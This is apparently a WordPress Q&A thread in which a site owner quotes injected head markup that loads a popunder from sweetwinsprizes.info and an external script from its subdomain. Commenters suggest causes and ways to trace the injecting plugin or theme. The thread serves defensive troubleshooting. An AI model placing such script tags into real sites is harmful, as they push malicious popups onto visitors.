# Finding plugin that makes this part of page (finding sweetwinsprizes.info virus's origin)

Tags: plugins, php, debug, maintenance, virus

I have a website with several plugins installed. in 70% of page loading everything is OK and header is something like this:

```
<head>
    <meta charset="UTF-8">
    <link rel="profile" href="https://gmpg.org/xfn/11">
    <link rel="pingback" href="https://www.[SiteName].com/xmlrpc.php">

    <script async="" src="https://www.google-analytics.com/analytics.js"></script>
    <script async="" src="https://www.googletagmanager.com/gtm.js?id=[Something]"></script>
    <script>window.MSInputMethodContext && document.documentMode && document.write('<script src="https://www.[SiteName].com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script>
        <meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1">
...
</head>
```

But sometimes page loading takes more time and then these scripts showed in header. in this case clicking on page cause to show an ads popup.
Header is then like this:

```
<head>
    <script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script>
    <script async="" src="https://www.google-analytics.com/analytics.js"></script><script async="" src="https://www.googletagmanager.com/gtm.js?id=[Something]"></script>
    <script>
        var popunder = {expire: 0, url: "https://sweetwinsprizes.info/?u=mr1kd0x&o=f5pp7z3&t=p1&cid=26tc7n4ebotq3j"};
    </script>
    <script src="https://jmedgdfg.sweetwinsprizes.info/fgdhslrir.js"></script>


    <meta charset="UTF-8">
    ...
</head>
```

(I noticed the position of "meta charset" and two "google analytics")

Now I am finding the plugin that makes this change. is there a way to specify every part of page's maker or make a list of plugin run hirearchy in wordpress? I also turn on Debug mode and nothing generated.

Comment: :-( I guess there's no "sweetswinprizes" string anywhere in your plugin, theme files or database - they've obfuscated it? Obviously either 1) you've been hacked or 2) you've accidentally installed some malicious code, so this is serious. It might be worth trying a security scanner plugin to see if that can spot the problem.

Comment: In all the default themes there are no hooks between `<head>` and `<meta charset>` so I'd start by looking at all of the places that's generated by your theme and what has the opportunity to inject script between them. This may be a normal action handler or it might be a WP_Scripts() object or similar. Then you can e.g. add error_log() calls to the core add_action code for when one of those is added to trace out the call stack, which would should you which plugin etc. this is coming from.

Comment: But given it looks to me like this needs cooperation of your theme, I'd guess it's your theme that's to blame. (Unless your theme has a hook there that the standard ones don't.)

Comment: @Rup Yes, I downloaded the entire files and searched for every keywords that can be simillar to, and no luck.

Comment: @Rup It's odd that virus injection is randomly. however where can I add error_log() calls?

Comment: That depends how it's generating the code between `<head>` and `<meta charset>`. What's there, are there any hooks it might be using? If there are then I'd add code to wp-includes/plugin.php's add_action() function to log a call stack whenever the specific action that it's calling get registered.